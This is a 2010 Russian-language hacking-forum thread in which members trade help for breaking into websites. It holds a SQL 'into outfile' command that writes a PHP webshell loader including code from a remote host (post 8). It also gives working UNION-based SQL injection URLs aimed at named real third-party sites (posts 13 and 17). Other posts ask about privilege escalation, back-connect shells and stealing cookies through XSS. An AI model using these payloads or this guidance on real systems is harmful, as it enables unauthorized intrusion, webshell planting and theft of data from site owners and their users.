Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. street16

    street16 Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    42
    Likes Received:
    5
    Reputations:
    1
    Подскажите пожалуйста есть шелл!Права uid=33(www-data) gid=33(www-data).safe mode-off!Не подскажите как можно пройти выше по каталогам?стоит Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 PHP/5.2.6-3ubuntu4.5?токо не судите строго!читал что можно как то открыть порт.и потом к нему присоедениться!
     
    #11341 street16, 7 Feb 2010
    Last edited: 7 Feb 2010
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    https://forum.antichat.net/thread148119.html
     
  3. F@!nT

    F@!nT New Member

    Joined:
    6 Mar 2008
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте.
    На сайте есть изменение цвета скина. "Переменная" берется через куки. Т.е. color: green стоит. Если же поставить color: "><script>alert()</script>, то прекрасно срабатывает.
    Есть возможность через другой локальный сайт установить для домена сайта, на котором есть уязвимость, куки с xss (или css, точно не знаю).
    Возможно ли как-нибудь использовать данную уязвимость, чтобы украсть куки или что-либо другое помимо простого алерта?
     
  4. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    а есть online converter для изменения char => hex ??
     
  5. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Например, вот .
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    http://x3k.ru/
     
  7. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    а моjно заливать shell из phpmyadmin-a ??
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274

    SELECT '<? @include("http://www.site.com/shell.txt"); ?>' into outfile '/абсолютный путь/shel.php';
     
  9. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    я знаю ету ну не нащел полнуы путь..и поетому из пхпмядмина хо4у заливат shell//
     
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,258
    Reputations:
    274
    по любому что бы залить шелл тебе нужен полный путь, в пхпмаядмине тоже через базу заливать надо...так что без путей никуда
     
  11. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    ok spasibo..
     
  12. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    2 LokbatanLi смотри пути в пхпинфо
     
  13. AleksTJ

    AleksTJ New Member

    Joined:
    9 Dec 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    http://www.mymac.ru/forum_heritage/showthreaded.php?Cat=-1%20union%20select%201%202%203%204%205%20--

    Вот здесь скуля ,а понять ни чего не могу . Кажется ,видно
    SQL ERROR: Unable to do_query: REPLACE INTO w3t_Online (O_Username,O_Last,O_What) VALUES ('-ANON-95.190.179.255','1265722842','showthreaded')

    а что и как незнаю.
    Дайте совет.

    :confused: Спасибо .
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    а в чем разница между твоей ссылкой и этими двумя?

     
  15. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Нашлась другая скуля:

    Вывод - в заголовке.
     
  16. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    версию добыл, но при обращении к инфорсхема еррор, как можно обойти?
     
  17. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    2 udman
    Code:
    http://krasn.int.ru/a-t_presents_category_hphp/login-hisotex/cat-1499999+union+select+1,2,3,table_name,5+from+information_schema%252etables+--+
     
    4 people like this.
  18. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    как работать с параметром сепаратор в mysql inj ?? в какоy ситуацие нуjeн ?
     
  19. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Столкнулся с проблемой: nmap 5 не сканирует внешние ипы, только моей сети, в то время как xSpider 7.5 справляется на ура. В чём трабл?
     
  20. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    есть шелл, на сервере включен сейф.. возможно как-то запустить бэк-коннект? disable_functions No value. хочу порутать,ядро 2007 года..
     
    #11360 .:[melkiy]:., 12 Feb 2010
    Last edited: 12 Feb 2010
Thread Status:
Not open for further replies.